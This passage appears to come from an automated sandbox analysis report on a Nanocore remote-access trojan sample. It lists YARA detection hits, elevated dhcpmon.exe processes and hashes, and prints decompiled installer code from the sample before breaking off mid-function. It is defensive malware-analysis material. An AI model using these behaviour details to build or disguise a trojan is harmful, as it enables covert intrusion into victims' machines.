          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684499268.00000000034FC000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.682558622.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.685817351.0000000004940000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.684426343.00000000034C1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000A.00000002.686102213.00000000049C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: dhcpmon.exe PID: 6152 Parent PID: 5752

          General

          Start time:01:08:03
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe' 0
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684555433.0000000002320000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.683969306.00000000006FC000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.686692380.0000000004922000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684652674.000000000330C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.686247080.00000000047F0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000B.00000002.684614120.00000000032D1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: dhcpmon.exe PID: 6724 Parent PID: 3424

          General

          Start time:01:08:12
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000C.00000002.691295579.000000001ED80000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Analysis Process: dhcpmon.exe PID: 6704 Parent PID: 6724

          General

          Start time:01:08:13
          Start date:09/04/2021
          Path:C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe
          Wow64 process (32bit):true
          Commandline:'C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe'
          Imagebase:0x400000
          File size:321222 bytes
          MD5 hash:08803CC817D8B1046A964AF11685B15C
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703714772.00000000033F1000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.704559063.0000000004FA2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703774283.000000000342C000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.702826612.0000000000400000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703677926.0000000002440000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.703409413.00000000006E7000.00000004.00000020.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.704356267.0000000004910000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Florian Roth
          • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: NanoCore, Description: unknown, Source: 0000000D.00000003.685637337.0000000000711000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
          Reputation:low

          Chronological Activities

          Disassembly

          Code Analysis

          Reset < >

            Analysis Process: nanocore.exe PID: 7064 Parent PID: 5956 nanocore.exeCOMMON

            Executed Functions

            Function 0040314A, Relevance: 86.0, APIs: 28, Strings: 21, Instructions: 282stringfilecomCOMMON
            Download Yara Rule
            C-Code - Quality: 86%
            			_entry_() {
				struct _SHFILEINFOA _v356;
				long _v372;
				char _v380;
				int _v396;
				CHAR* _v400;
				signed int _v404;
				signed int _v408;
				char _v416;
				intOrPtr _v424;
				intOrPtr _t31;
				void* _t36;
				CHAR* _t41;
				signed int _t43;
				CHAR* _t46;
				signed int _t48;
				int _t52;
				signed int _t56;
				void* _t78;
				CHAR* _t89;
				signed int _t90;
				void* _t91;
				CHAR* _t96;
				signed int _t97;
				signed int _t99;
				signed char* _t103;
				CHAR* _t105;
				signed int _t106;
				void* _t108;

				_t99 = 0;
				_v372 = 0;
				_t105 = "Error writing temporary file. Make sure your temp folder is valid.";
				_v380 = 0x20;
				__imp__#17();
				__imp__OleInitialize(0); // executed
				 *0x7a3030 = _t31;
				SHGetFileInfoA(0x79e540, 0,  &_v356, 0x160, 0); // executed
				E004059BF(0x7a2780, "NSIS Error");
				_t89 = "C:\\Users\\jones\\AppData\\Local\\Temp\\";
				GetTempPathA(0x400, _t89);
				_t36 = E00403116(_t108);
				_t109 = _t36;
				if(_t36 != 0) {
					L2:
					_t96 = "\"C:\\Users\\jones\\Desktop\\nanocore.exe\" ";
					DeleteFileA(_t96); // executed
					E004059BF(_t96, GetCommandLineA());
					 *0x7a2f80 = GetModuleHandleA(0);
					_t41 = _t96;
					if("\"C:\\Users\\jones\\Desktop\\nanocore.exe\" " == 0x22) {
						_v404 = 0x22;
						_t41 =  &M007A9001;
					}
					_t43 = CharNextA(E004054F7(_t41, _v404));
					_v408 = _t43;
					while(1) {
						_t91 =  *_t43;
						_t112 = _t91;
						if(_t91 == 0) {
							break;
						}
						__eflags = _t91 - 0x20;
						if(_t91 != 0x20) {
							L7:
							__eflags =  *_t43 - 0x22;
							_v404 = 0x20;
							if( *_t43 == 0x22) {
								_t43 = _t43 + 1;
								__eflags = _t43;
								_v404 = 0x22;
							}
							__eflags =  *_t43 - 0x2f;
							if( *_t43 != 0x2f) {
								L17:
								_t43 = E004054F7(_t43, _v404);
								__eflags =  *_t43 - 0x22;
								if(__eflags == 0) {
									_t43 = _t43 + 1;
									__eflags = _t43;
								}
								continue;
							} else {
								_t43 = _t43 + 1;
								__eflags =  *_t43 - 0x53;
								if( *_t43 == 0x53) {
									__eflags = ( *(_t43 + 1) | 0x00000020) - 0x20;
									if(( *(_t43 + 1) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000002;
										__eflags = _t99;
									}
								}
								__eflags =  *_t43 - 0x4352434e;
								if( *_t43 == 0x4352434e) {
									__eflags = ( *(_t43 + 4) | 0x00000020) - 0x20;
									if(( *(_t43 + 4) | 0x00000020) == 0x20) {
										_t99 = _t99 | 0x00000004;
										__eflags = _t99;
									}
								}
								__eflags =  *(_t43 - 2) - 0x3d442f20;
								if( *(_t43 - 2) == 0x3d442f20) {
									 *(_t43 - 2) =  *(_t43 - 2) & 0x00000000;
									__eflags = _t43 + 2;
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t43 + 2);
									L22:
									_t46 = E00402C37(_t112, _t99); // executed
									_t105 = _t46;
									if(_t105 != 0) {
										L32:
										E00403501();
										__imp__OleUninitialize();
										if(_t105 == 0) {
											__eflags =  *0x7a3014;
											if( *0x7a3014 != 0) {
												_t106 = E00405CD2("ADVAPI32.dll", "OpenProcessToken");
												_t97 = E00405CD2("ADVAPI32.dll", "LookupPrivilegeValueA");
												_t90 = E00405CD2("ADVAPI32.dll", "AdjustTokenPrivileges");
												__eflags = _t106;
												if(_t106 != 0) {
													__eflags = _t97;
													if(_t97 != 0) {
														__eflags = _t90;
														if(_t90 != 0) {
															_t56 =  *_t106(GetCurrentProcess(), 0x28,  &_v400);
															__eflags = _t56;
															if(_t56 != 0) {
																 *_t97(0, "SeShutdownPrivilege",  &_v400);
																_v416 = 1;
																_v404 = 2;
																 *_t90(_v424, 0,  &_v416, 0, 0, 0);
															}
														}
													}
												}
												_t52 = ExitWindowsEx(2, 0);
												__eflags = _t52;
												if(_t52 == 0) {
													E00401410(9);
												}
											}
											_t48 =  *0x7a302c;
											__eflags = _t48 - 0xffffffff;
											if(_t48 != 0xffffffff) {
												_v396 = _t48;
											}
											ExitProcess(_v396);
										}
										E004052BF(_t105, 0x200010);
										ExitProcess(2);
									}
									if( *0x7a2f94 == _t46) {
										L31:
										 *0x7a302c =  *0x7a302c | 0xffffffff;
										_v396 = E00403526();
										goto L32;
									}
									_t103 = E004054F7(_t96, _t46);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t116 = _t103 - _t96;
									_t105 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t89, "~nsu.tmp\\");
										CreateDirectoryA(_t89, 0);
										_v404 = _v404 & 0x00000000;
										do {
											 *0x79d940 = 0x22;
											lstrcatA(0x79d940, _t89);
											lstrcatA(0x79d940, "Au_.exe");
											DeleteFileA(0x79d941);
											if(_t105 == 0) {
												goto L43;
											}
											if(lstrcmpiA(GetModuleFileNameA( *0x7a2f80, 0x79e140, 0x400) + 0x79e13a,  &M004091A1) == 0) {
												goto L32;
											}
											if(CopyFileA(0x79e140, 0x79d941, 0) != 0) {
												E00405707(0x79d941, 0);
												if("C:\\Users\\jones\\AppData\\Local\\Temp" == 0) {
													E00405513(0x79e140);
												} else {
													E004059BF(0x79e140, "C:\\Users\\jones\\AppData\\Local\\Temp");
												}
												lstrcatA(0x79d940, "\" ");
												lstrcatA(0x79d940, _v400);
												lstrcatA(0x79d940, " _?=");
												lstrcatA(0x79d940, 0x79e140);
												E004054CC(0x79d940);
												_t78 = E00405247(0x79d940, _t89);
												if(_t78 != 0) {
													CloseHandle(_t78);
													_t105 = 0;
												}
											}
											L43:
											"Au_.exe" =  &("Au_.exe"[1]);
											_v404 = _v404 + 1;
										} while (_v404 < 0x1a);
										goto L32;
									}
									 *_t103 =  *_t103 & 0x00000000;
									_t104 =  &(_t103[4]);
									if(E004055AC(_t116,  &(_t103[4])) == 0) {
										goto L32;
									}
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									E004059BF("C:\\Users\\jones\\AppData\\Local\\Temp", _t104);
									_t105 = 0;
									goto L31;
								}
								goto L17;
							}
						} else {
							goto L6;
						}
						do {
							L6:
							_t43 = _t43 + 1;
							__eflags =  *_t43 - 0x20;
						} while ( *_t43 == 0x20);
						goto L7;
					}
					goto L22;
				}
				GetWindowsDirectoryA(_t89, 0x3fb);
				lstrcatA(_t89, "\\Temp");
				if(E00403116(_t109) == 0) {
					goto L32;
				}
				goto L2;
			}































            0x00403153
            0x00403156
            0x0040315a
            0x0040315f
            0x00403164
            0x0040316b
            0x00403171
            0x00403187
            0x00403197
            0x0040319c
            0x004031a7
            0x004031ad
            0x004031b2
            0x004031b4
            0x004031da
            0x004031da
            0x004031e0
            0x004031ee
            0x00403202
            0x00403207
            0x00403209
            0x0040320b
            0x00403210
            0x00403210
            0x00403220
            0x00403226
            0x0040328f
            0x0040328f
            0x00403291
            0x00403293
            0x00000000
            0x00000000
            0x0040322c
            0x0040322f
            0x00403237
            0x00403237
            0x0040323a
            0x0040323f
            0x00403241
            0x00403241
            0x00403242
            0x00403242
            0x00403247
            0x0040324a
            0x0040327f
            0x00403284
            0x00403289
            0x0040328c
            0x0040328e
            0x0040328e
            0x0040328e
            0x00000000
            0x0040324c
            0x0040324c
            0x0040324d
            0x00403250
            0x00403258
            0x0040325b
            0x0040325d
            0x0040325d
            0x0040325d
            0x0040325b
            0x00403260
            0x00403266
            0x0040326e
            0x00403271
            0x00403273
            0x00403273
            0x00403273
            0x00403271
            0x00403276
            0x0040327d
            0x00403297
            0x0040329b
            0x004032a4
            0x004032a9
            0x004032aa
            0x004032af
            0x004032b3
            0x00403316
            0x00403316
            0x0040331b
            0x00403323
            0x0040344e
            0x00403455
            0x00403471
            0x0040347e
            0x00403487
            0x00403489
            0x0040348b
            0x0040348d
            0x0040348f
            0x00403491
            0x00403493
            0x004034a3
            0x004034a5
            0x004034a7
            0x004034b4
            0x004034c3
            0x004034cb
            0x004034d3
            0x004034d3
            0x004034a7
            0x00403493
            0x0040348f
            0x004034d8
            0x004034de
            0x004034e0
            0x004034e4
            0x004034e4
            0x004034e0
            0x004034e9
            0x004034ee
            0x004034f1
            0x004034f3
            0x004034f3
            0x004034fb
            0x004034fb
            0x0040332f
            0x00403336
            0x00403336
            0x004032bb
            0x00403306
            0x00403306
            0x00403312
            0x00000000
            0x00403312
            0x004032c4
            0x004032d1
            0x004032c8
            0x004032ce
            0x00000000
            0x00000000
            0x004032d0
            0x004032d0
            0x004032d0
            0x004032d5
            0x004032d7
            0x004032dc
            0x00403342
            0x0040334a
            0x00403350
            0x0040335f
            0x00403361
            0x0040336a
            0x00403375
            0x0040337f
            0x00403387
            0x00000000
            0x00000000
            0x004033b3
            0x00000000
            0x00000000
            0x004033c9
            0x004033d2
            0x004033de
            0x004033ee
            0x004033e0
            0x004033e6
            0x004033e6
            0x004033f9
            0x00403403
            0x0040340e
            0x00403415
            0x0040341b
            0x00403422
            0x00403429
            0x0040342c
            0x00403432
            0x00403432
            0x00403429
            0x00403434
            0x00403434
            0x0040343a
            0x0040343e
            0x00000000
            0x00403449
            0x004032de
            0x004032e1
            0x004032ec
            0x00000000
            0x00000000
            0x004032f4
            0x004032ff
            0x00403304
            0x00000000
            0x00403304
            0x00000000
            0x0040327d
            0x00000000
            0x00000000
            0x00000000
            0x00403231
            0x00403231
            0x00403231
            0x00403232
            0x00403232
            0x00000000
            0x00403231
            0x00000000
            0x00403295
            0x004031bc
            0x004031c8
            0x004031d4
            0x00000000
            0x00000000
            0x00000000

            APIs
            • #17.COMCTL32 ref: 00403164
            • OleInitialize.OLE32(00000000), ref: 0040316B
            • SHGetFileInfoA.SHELL32(0079E540,00000000,?,00000160,00000000), ref: 00403187
              • Part of subcall function 004059BF: lstrcpynA.KERNEL32(?,?,00000400,0040319C,007A2780,NSIS Error), ref: 004059CC
            • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,007A2780,NSIS Error), ref: 004031A7
            • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 004031BC
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004031C8
              • Part of subcall function 00403116: CreateDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B2), ref: 00403137
            • DeleteFileA.KERNELBASE("C:\Users\user\Desktop\nanocore.exe" ), ref: 004031E0
            • GetCommandLineA.KERNEL32 ref: 004031E6
            • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\nanocore.exe" ,00000000), ref: 004031F5
            • CharNextA.USER32(00000000,"C:\Users\user\Desktop\nanocore.exe" ,00000020), ref: 00403220
            • OleUninitialize.OLE32(00000000,00000000,00000020), ref: 0040331B
            • ExitProcess.KERNEL32 ref: 00403336
            • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,00000000,00000020), ref: 00403342
            • CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,~nsu.tmp\,"C:\Users\user\Desktop\nanocore.exe" ,00000000,00000000,00000000,00000020), ref: 0040334A
            • lstrcatA.KERNEL32(0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040336A
            • lstrcatA.KERNEL32(0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 00403375
            • DeleteFileA.KERNEL32(0079D941,0079D940,Au_.exe,0079D940,C:\Users\user\AppData\Local\Temp\), ref: 0040337F
            • GetModuleFileNameA.KERNEL32(0079E140,00000400), ref: 00403399
            • lstrcmpiA.KERNEL32(?,u_.exe), ref: 004033AB
            • CopyFileA.KERNEL32 ref: 004033C1
            • lstrcatA.KERNEL32(0079D940,00409218,0079E140,0079D941,00000000), ref: 004033F9
            • lstrcatA.KERNEL32(0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403403
            • lstrcatA.KERNEL32(0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040340E
            • lstrcatA.KERNEL32(0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 00403415
            • CloseHandle.KERNEL32(00000000,0079D940,C:\Users\user\AppData\Local\Temp\,0079D940,0079D940,0079E140,0079D940, _?=,0079D940,00000000,0079D940,00409218,0079E140,0079D941,00000000), ref: 0040342C
            • GetCurrentProcess.KERNEL32(00000028,?,ADVAPI32.dll,AdjustTokenPrivileges,ADVAPI32.dll,LookupPrivilegeValueA,ADVAPI32.dll,OpenProcessToken), ref: 0040349C
            • ExitWindowsEx.USER32(00000002,00000000), ref: 004034D8
            • ExitProcess.KERNEL32 ref: 004034FB
            Strings
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrcat$File$DirectoryExitProcess$CreateDeleteHandleModuleWindows$CharCloseCommandCopyCurrentInfoInitializeLineNameNextPathTempUninitializelstrcmpilstrcpyn
            • String ID: /D=$ _?=$ _?=$"$"C:\Users\user\Desktop\nanocore.exe" $@y$ADVAPI32.dll$AdjustTokenPrivileges$Au_.exe$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$LookupPrivilegeValueA$NCRC$NSIS Error$OpenProcessToken$SeShutdownPrivilege$\Temp$~nsu.tmp\
            • API String ID: 3079827372-1314311271
            • Opcode ID: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction ID: c6ceebf7ae23f53b4317326a2321724ec613524e7e1bbd79e967450880995801
            • Opcode Fuzzy Hash: 47f34ade52d88a0d51b74b8dd2826b7976c72476fa727e71a17f23d6d741ace8
            • Instruction Fuzzy Hash: 3B91D370508350BAE7216FA19D0AB6B7E9CEF46716F14047EF541B61D3CBBC9D008AAE
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405301, Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 156filestringCOMMON
            Download Yara Rule
            C-Code - Quality: 98%
            			E00405301(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed char _t51;
				signed int _t54;
				signed int _t57;
				signed int _t63;
				signed int _t65;
				void* _t67;
				signed int _t70;
				CHAR* _t72;
				CHAR* _t74;
				char* _t77;

				_t74 = _a4;
				_t37 = E004055AC(__eflags, _t74);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t65 = DeleteFileA(_t74); // executed
					asm("sbb eax, eax");
					_t67 =  ~_t65 + 1;
					 *0x7a3008 =  *0x7a3008 + _t67;
					return _t67;
				}
				_t70 = _a8 & 0x00000001;
				__eflags = _t70;
				_v8 = _t70;
				if(_t70 == 0) {
					L5:
					E004059BF(0x7a0588, _t74);
					__eflags = _t70;
					if(_t70 == 0) {
						E00405513(_t74);
					} else {
